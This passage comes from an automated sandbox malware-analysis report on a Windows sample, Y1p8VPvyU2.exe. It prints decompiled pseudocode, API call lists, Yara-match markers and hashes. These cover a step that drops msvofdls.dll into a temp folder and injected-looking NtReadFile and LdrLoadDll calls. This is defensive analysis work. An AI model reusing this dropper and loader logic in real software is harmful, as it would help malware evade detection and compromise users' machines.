                                      				CHAR* _t3;
                                      				char* _t5;
                                      				CHAR* _t7;
                                      				CHAR* _t8;
                                      				void* _t10;
                                      
                                      				_t1 =  &_a4; // 0x405264
                                      				_t8 =  *_t1;
                                      				_t7 = CharNextA(_t8);
                                      				_t3 = CharNextA(_t7);
                                      				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                      					if( *_t8 != 0x5c5c) {
                                      						L8:
                                      						return 0;
                                      					}
                                      					_t10 = 2;
                                      					while(1) {
                                      						_t10 = _t10 - 1;
                                      						_t5 = E00405449(_t3, 0x5c);
                                      						if( *_t5 == 0) {
                                      							goto L8;
                                      						}
                                      						_t3 = _t5 + 1;
                                      						if(_t10 != 0) {
                                      							continue;
                                      						}
                                      						return _t3;
                                      					}
                                      					goto L8;
                                      				} else {
                                      					return CharNextA(_t3);
                                      				}
                                      			}









                                      APIs
                                      • CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 004054C0
                                      • CharNextA.USER32(00000000), ref: 004054C5
                                      • CharNextA.USER32(00000000), ref: 004054D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CharNext
                                      • String ID: dR@
                                      • API String ID: 3213498283-1322173608
                                      • Opcode ID: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                      • Instruction ID: ba3132894351e94c97711127f452fc04d7c27ede8e93237e74fa5b384ede3bcd
                                      • Opcode Fuzzy Hash: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                      • Instruction Fuzzy Hash: AAF0A751944B2165E73222AC5C44BFB6B9CDB55712F144437E600B61D186BC5CC29FBA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 67%
                                      			E00401D1B() {
                                      				void* __esi;
                                      				int _t6;
                                      				signed char _t11;
                                      				struct HFONT__* _t14;
                                      				void* _t18;
                                      				void* _t24;
                                      				void* _t26;
                                      				void* _t28;
                                      
                                      				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                                      				0x40af7c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                                      				 *0x40af8c = E004029CB(3);
                                      				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                      				 *0x40af93 = 1;
                                      				 *0x40af90 = _t11 & 0x00000001;
                                      				 *0x40af91 = _t11 & 0x00000002;
                                      				 *0x40af92 = _t11 & 0x00000004;
                                      				E0040594D(_t18, _t24, _t26, 0x40af98,  *((intOrPtr*)(_t28 - 0x20)));
                                      				_t14 = CreateFontIndirectA(0x40af7c);
                                      				_push(_t14);
                                      				_push(_t26);
                                      				E00405889();
                                      				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
                                      				return 0;
                                      			}












                                      APIs
                                      • GetDC.USER32(?), ref: 00401D22
                                      • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                      • CreateFontIndirectA.GDI32(0040AF7C), ref: 00401D8A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirect
                                      • String ID:
                                      • API String ID: 3272661963-0
                                      • Opcode ID: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                      • Instruction ID: 88b098f1539f08df6dee2951bb44ee62bc7572b1891c100f3a3d81e12d825a95
                                      • Opcode Fuzzy Hash: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                      • Instruction Fuzzy Hash: 5EF04FF1A48741AEE7029770AE1BB9A3B64A715309F104939F142BA1E2C6BC04158B3F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 61%
                                      			E10007580(intOrPtr _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
                                      				int _v8;
                                      				int _v12;
                                      				char* _v16;
                                      				int _v20;
                                      				int _v24;
                                      				int _v28;
                                      				int _v32;
                                      				unsigned int _v36;
                                      				int _v40;
                                      				short* _v44;
                                      				intOrPtr _v48;
                                      				char _v4148;
                                      				short _v12344;
                                      				intOrPtr _t148;
                                      				void* _t209;
                                      				void* _t210;
                                      				void* _t211;
                                      
                                      				E1000DF30(0x3034);
                                      				_v20 = 0;
                                      				_v40 = 0;
                                      				_v28 = 0;
                                      				_v32 = 0;
                                      				0x10000000("%08x %p\n", _a8, _a12);
                                      				_t211 = _t210 + 0xc;
                                      				do {
                                      					_v36 = 0;
                                      					if( *(_a12 + 4) != 0) {
                                      						L7:
                                      						if((_a8 & 0x00000010) != 0) {
                                      							_v36 =  *(_a12 + 4) >> 1;
                                      							_v44 = _a12 + 0xc;
                                      							L35:
                                      							0x10000000(_a4, 0, _v44, _v36, _a16);
                                      							_t211 = _t211 + 0x14;
                                      							if( *(_a12 + 4) != 0) {
                                      								goto L37;
                                      							}
                                      							break;
                                      						}
                                      						_v16 = _a12 + 0xc;
                                      						_v12 =  *(_a12 + 4);
                                      						if(_v40 == 0) {
                                      							_v40 = 1;
                                      							if( *(_a12 + 4) >= 3) {
                                      								_t148 = E1000DF5B(_a12 + 0xc, 0x1001a280, 3);
                                      								_t211 = _t211 + 0xc;
                                      								_v48 = _t148;
                                      								if(_v48 == 0) {
                                      									_v28 = 0xfde9;
                                      									_v16 =  &(_v16[3]);
                                      									_v12 = _v12 - 3;
                                      								}
                                      							}
                                      						}
                                      						if(_v28 != 0xfde9) {
                                      							_v8 = _v12;
                                      							goto L30;
                                      						} else {
                                      							if(_v32 != 0) {
                                      								E1000F6E0(_t209 + _v32 - 0x1030, _v16, _v12);
                                      								_t211 = _t211 + 0xc;
                                      								_v16 =  &_v4148;
                                      								_v12 = _v12 + _v32;
                                      							}
                                      							_v8 = _v12;
                                      							while(( *( &(_v16[_v8]) - 1) & 0x000000c0) == 0x80) {
                                      								_v8 = _v8 - 1;
                                      								_v20 = _v20 - 1;
                                      							}
                                      							if(( *( &(_v16[_v8]) - 1) & 0x00000080) != 0) {
                                      								_v24 = 0;
                                      								if(( *( &(_v16[_v8]) - 1) & 0x000000e0) == 0xc0) {
                                      									_v24 = 1;
                                      								}
                                      								if(( *( &(_v16[_v8]) - 1) & 0x000000f0) == 0xe0) {
                                      									_v24 = 2;
                                      								}
                                      								if(( *( &(_v16[_v8]) - 1) & 0x000000f8) == 0xf0) {
                                      									_v24 = 3;
                                      								}
                                      								if(_v12 - _v8 < _v24) {
                                      									_v8 = _v8 - 1;
                                      								} else {
                                      									_v8 = _v12;
                                      								}
                                      							}
                                      							L30:
                                      							_v36 = MultiByteToWideChar(_v28, 0, _v16, _v8,  &_v12344, 0x1000);
                                      							_v44 =  &_v12344;
                                      							if(_v28 == 0xfde9 && _v8 != _v12) {
                                      								E1000F6E0( &_v4148,  &(_v16[_v8]), _v12 - _v8);
                                      								_t211 = _t211 + 0xc;
                                      								_v32 = _v12 - _v8;
                                      							}
                                      							goto L35;
                                      						}
                                      					}
                                      					E10006F40(_a12);
                                      					_t211 = _t211 + 4;
                                      					if( *((intOrPtr*)( *_a12 + 4)) == 0) {
                                      						if( *(_a12 + 4) != 0) {
                                      							_v20 = _v20 +  *(_a12 + 4);
                                      							goto L7;
                                      						} else {
                                      							break;
                                      						}
                                      					} else {
                                      						break;
                                      					}
                                      					L37:
                                      					 *(_a12 + 4) = 0;
                                      				} while (1 != 0);
                                      				return _v20;
                                      			}





















                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID: %08x %p
                                      • API String ID: 2931989736-201491226
                                      • Opcode ID: 3ff21c5d3ad036bdee60d819defc67f78e0883bc9fdfbfc60149b250d55da2e1
                                      • Instruction ID: 48059df18655bbf468ed25d8ba14e77a1c251dfa8b0634538407f3da8604fe05
                                      • Opcode Fuzzy Hash: 3ff21c5d3ad036bdee60d819defc67f78e0883bc9fdfbfc60149b250d55da2e1
                                      • Instruction Fuzzy Hash: 109137B4D04249DFEB04CF98C994BEEBBB1FF44384F248199E5196B249C779AA40CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 65%
                                      			E1000416E() {
                                      				void* _t65;
                                      				signed int _t70;
                                      				void* _t81;
                                      				void* _t109;
                                      				void* _t111;
                                      
                                      				if(( *( *((intOrPtr*)(_t109 + 8)) + 0x54) & 0x00020000) == 0) {
                                      					L3:
                                      					 *(_t109 - 0x26c) = GetKeyState(0x11) & 0x00008000;
                                      					 *(_t109 - 0xb0) =  *(_t109 + 0x10) >> 0x00000010 & 0x0000ffff;
                                      					if( *(_t109 - 0xb0) >= 0 ||  *( *((intOrPtr*)(_t109 + 8)) + 0x538) >= 0) {
                                      						if( *(_t109 - 0xb0) <= 0 ||  *( *((intOrPtr*)(_t109 + 8)) + 0x538) <= 0) {
                                      							 *( *((intOrPtr*)(_t109 + 8)) + 0x538) =  *(_t109 - 0xb0);
                                      							goto L9;
                                      						} else {
                                      							goto L7;
                                      						}
                                      					} else {
                                      						L7:
                                      						 *( *((intOrPtr*)(_t109 + 8)) + 0x538) =  *( *((intOrPtr*)(_t109 + 8)) + 0x538) +  *(_t109 - 0xb0);
                                      						L9:
                                      						_t87 =  *((intOrPtr*)(_t109 + 8));
                                      						if( *( *((intOrPtr*)(_t109 + 8)) + 0x538) != 0) {
                                      							if( *(_t109 - 0x26c) == 0) {
                                      								 *(_t109 - 0xf0) = 3;
                                      								 *(_t109 - 0xf4) = 0;
                                      								SystemParametersInfoW(0x68, 0, _t109 - 0xf0, 0);
                                      								if( *(_t109 - 0xf0) != 0) {
                                      									_t87 =  *((intOrPtr*)(_t109 + 8)) + 0x538;
                                      									_t70 = E1000B660( *((intOrPtr*)(_t109 + 8)) + 0x538,  *((intOrPtr*)(_t109 + 8)) + 0x538,  *(_t109 - 0xf0));
                                      									_t111 = _t111 + 8;
                                      									 *(_t109 - 0xf4) = _t70;
                                      								}
                                      								if( *(_t109 - 0xf4) != 0) {
                                      									0x10000000( *((intOrPtr*)(_t109 + 8)),  ~( *(_t109 - 0xf4)) * E1000B610(_t87,  *((intOrPtr*)(_t109 + 8))));
                                      								}
                                      							} else {
                                      								if( *( *((intOrPtr*)(_t109 + 8)) + 0x48c) == 0 ||  *( *((intOrPtr*)(_t109 + 8)) + 0x490) == 0) {
                                      									 *(_t109 - 0x50) = 0x64;
                                      								} else {
                                      									_t87 =  *((intOrPtr*)(_t109 + 8));
                                      									asm("cdq");
                                      									 *(_t109 - 0x50) =  *( *((intOrPtr*)(_t109 + 8)) + 0x48c) * 0x64 /  *( *((intOrPtr*)(_t109 + 8)) + 0x490);
                                      								}
                                      								 *(_t109 - 0x50) = E1000B660(_t87,  *((intOrPtr*)(_t109 + 8)) + 0x538, 0xa) +  *(_t109 - 0x50);
                                      								if( *(_t109 - 0x50) >= 0xa &&  *(_t109 - 0x50) <= 0x1f4) {
                                      									0x10000000( *((intOrPtr*)(_t109 + 8)),  *(_t109 - 0x50), 0x64);
                                      								}
                                      							}
                                      						}
                                      						_t65 = 0;
                                      						L25:
                                      						return _t65;
                                      					}
                                      				}
                                      				_t81 = E10009E20( *((intOrPtr*)(_t109 + 8)),  *((intOrPtr*)(_t109 + 0xc)), _t109 + 0x10, _t109 + 0x14);
                                      				_t111 = _t111 + 0x10;
                                      				if(_t81 != 0) {
                                      					goto L3;
                                      				}
                                      				_t65 = 0;
                                      				goto L25;
                                      			}









                                      APIs
                                      • GetKeyState.USER32(00000011), ref: 100041A1
                                      • SystemParametersInfoW.USER32 ref: 100042CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: InfoParametersStateSystem
                                      • String ID: d
                                      • API String ID: 272850323-2564639436
                                      • Opcode ID: af013151c7d25e7af5b7143f33da0088bdfd5989dda4c3ef93615b9b250b18e2
                                      • Instruction ID: 706955244737e6057f292ee1052708cc1a6e74b64e25e174ef6a0550d938cb32
                                      • Opcode Fuzzy Hash: af013151c7d25e7af5b7143f33da0088bdfd5989dda4c3ef93615b9b250b18e2
                                      • Instruction Fuzzy Hash: 81517CB4A00219EFEB14CF44DC85BEA77B1FB44385F1581A8F9099B285DB75AA84CF84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MessageBeep.USER32(00000010), ref: 10009BAC
                                      • OleGetClipboard.OLE32(00000000), ref: 10009BE3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: BeepClipboardMessage
                                      • String ID: Ignoring aspect %x
                                      • API String ID: 228258591-4055797955
                                      • Opcode ID: f4ed0627a9ade7f5ca503d752d68fc64d299010cc5684f27cf2b4fabc52ae226
                                      • Instruction ID: 2096109ce8d92f55ba0aaf4a3113f387be1e19d692349cc64a6d0ec485e1d8f7
                                      • Opcode Fuzzy Hash: f4ed0627a9ade7f5ca503d752d68fc64d299010cc5684f27cf2b4fabc52ae226
                                      • Instruction Fuzzy Hash: CE4117B4D00209EFFB00DF94D985B9EB7F1EB44395F2084A9E8059B289E3749A84DB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404C19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                      				long _t22;
                                      
                                      				if(_a8 != 0x102) {
                                      					if(_a8 != 0x200) {
                                      						_t22 = _a16;
                                      						L7:
                                      						if(_a8 == 0x419 &&  *0x429fc0 != _t22) {
                                      							 *0x429fc0 = _t22;
                                      							E0040592B(0x429fd8, 0x42f000);
                                      							E00405889(0x42f000, _t22);
                                      							E0040140B(6);
                                      							E0040592B(0x42f000, 0x429fd8);
                                      						}
                                      						L11:
                                      						return CallWindowProcA( *0x429fc8, _a4, _a8, _a12, _t22);
                                      					}
                                      					if(IsWindowVisible(_a4) == 0) {
                                      						L10:
                                      						_t22 = _a16;
                                      						goto L11;
                                      					}
                                      					_t22 = E00404598(_a4, 1);
                                      					_a8 = 0x419;
                                      					goto L7;
                                      				}
                                      				if(_a12 != 0x20) {
                                      					goto L10;
                                      				}
                                      				E00403D29(0x413);
                                      				return 0;
                                      			}





                                      APIs
                                      • IsWindowVisible.USER32 ref: 00404C4F
                                      • CallWindowProcA.USER32 ref: 00404CBD
                                        • Part of subcall function 00403D29: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403D3B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Window$CallMessageProcSendVisible
                                      • String ID:
                                      • API String ID: 3748168415-3916222277
                                      • Opcode ID: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                      • Instruction ID: d407fede90f1340f75a9edbd02c1d8e6092547d547c096207559e891c258f88e
                                      • Opcode Fuzzy Hash: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                      • Instruction Fuzzy Hash: C1119D71105608BFEF21AF52DD4099B3729EF84769F01803AFA05751E1C37D8C62CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                      				int _t5;
                                      				long _t7;
                                      				struct _OVERLAPPED* _t11;
                                      				intOrPtr* _t15;
                                      				void* _t17;
                                      				int _t21;
                                      
                                      				_t15 = __esi;
                                      				_t11 = __ebx;
                                      				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                      					_t7 = lstrlenA(E004029E8(0x11));
                                      				} else {
                                      					E004029CB(1);
                                      					 *0x409f78 = __al;
                                      				}
                                      				if( *_t15 == _t11) {
                                      					L8:
                                      					 *((intOrPtr*)(_t17 - 4)) = 1;
                                      				} else {
                                      					_t5 = WriteFile(E004058A2(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll", _t7, _t17 + 8, _t11);
                                      					_t21 = _t5;
                                      					if(_t21 == 0) {
                                      						goto L8;
                                      					}
                                      				}
                                      				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t17 - 4));
                                      				return 0;
                                      			}










                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll, xrefs: 004024BC, 004024E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: FileWritelstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll
                                      • API String ID: 427699356-3367961579
                                      • Opcode ID: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                      • Instruction ID: 2b901ff19b85a4e76c04b2b8852d4c7aed572531c5b12b0aefee0adfe1f835b5
                                      • Opcode Fuzzy Hash: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                      • Instruction Fuzzy Hash: 7EF0E9B2A54240BFDB00EBB19D49EAB76589B00344F20443BB142F50C2D6BC8D819B2D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405465(char* _a4) {
                                      				char* _t3;
                                      				char* _t5;
                                      
                                      				_t5 = _a4;
                                      				_t3 =  &(_t5[lstrlenA(_t5)]);
                                      				while( *_t3 != 0x5c) {
                                      					_t3 = CharPrevA(_t5, _t3);
                                      					if(_t3 > _t5) {
                                      						continue;
                                      					}
                                      					break;
                                      				}
                                      				 *_t3 =  *_t3 & 0x00000000;
                                      				return  &(_t3[1]);
                                      			}






                                      APIs
                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Y1p8VPvyU2.exe,C:\Users\user\Desktop\Y1p8VPvyU2.exe,80000000,00000003), ref: 0040546B
                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Y1p8VPvyU2.exe,C:\Users\user\Desktop\Y1p8VPvyU2.exe,80000000,00000003), ref: 00405479
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CharPrevlstrlen
                                      • String ID: C:\Users\user\Desktop
                                      • API String ID: 2709904686-1669384263
                                      • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                      • Instruction ID: d448c4330aaee4e1d52c8fc1992275a879f371812311106428750dc828cdcd14
                                      • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                      • Instruction Fuzzy Hash: 6CD09EA241D9A06EE30256149C04B9F6A48DB16711F194462E580A6191C2785D818BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405577(CHAR* _a4, CHAR* _a8) {
                                      				int _t10;
                                      				int _t15;
                                      				CHAR* _t16;
                                      
                                      				_t15 = lstrlenA(_a8);
                                      				_t16 = _a4;
                                      				while(lstrlenA(_t16) >= _t15) {
                                      					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                      					_t10 = lstrcmpiA(_t16, _a8);
                                      					if(_t10 == 0) {
                                      						return _t16;
                                      					}
                                      					_t16 = CharNextA(_t16);
                                      				}
                                      				return 0;
                                      			}







                                      APIs
                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                      • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405597
                                      • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004055A5
                                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                      • Instruction ID: 67566e0cb393ef72fa6fa9f0f91681af9918d2384c5fdc364e409a19ee530f2a
                                      • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                      • Instruction Fuzzy Hash: D2F0A73620AD51EBD2025B255C04E6B7A99EF91324B14057AF440F2144D3399C529BBB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      C-Code - Quality: 37%
                                      			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                      				void* _t18;
                                      				void* _t27;
                                      				intOrPtr* _t28;
                                      
                                      				_t13 = _a4;
                                      				_t28 = _a4 + 0xc48;
                                      				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                      				_t4 =  &_a40; // 0x413a31
                                      				_t6 =  &_a32; // 0x413d72
                                      				_t12 =  &_a8; // 0x413d72
                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                      				return _t18;
                                      			}







                                      APIs
                                      • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1:A$r=A$r=A
                                      • API String ID: 2738559852-4243674446
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 50%
                                      			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
                                      				char* _v8;
                                      				char _v12;
                                      				char _v16;
                                      				char _v536;
                                      				void* _t15;
                                      				intOrPtr _t17;
                                      				char _t18;
                                      				void* _t30;
                                      				void* _t31;
                                      				void* _t32;
                                      
                                      				_v8 =  &_v536;
                                      				_t15 = E0041AF70( &_v12, 0x104, _a8);
                                      				_t31 = _t30 + 0xc;
                                      				if(_t15 != 0) {
                                      					_t17 = E0041B390(__eflags, _v8);
                                      					_t32 = _t31 + 4;
                                      					__eflags = _t17;
                                      					if(_t17 != 0) {
                                      						E0041B610( &_v12, 0);
                                      						_t32 = _t32 + 8;
                                      					}
                                      					_t18 = E00419720(_v8);
                                      					_v16 = _t18;
                                      					__eflags = _t18;
                                      					if(_t18 == 0) {
                                      						_push( &_v16);
                                      						_push( &_v12);
                                      						_push(0);
                                      						LdrLoadDll(0); // executed
                                      						return _v16;
                                      					}
                                      					return _t18;
                                      				} else {
                                      					return _t15;
                                      				}
                                      			}














                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
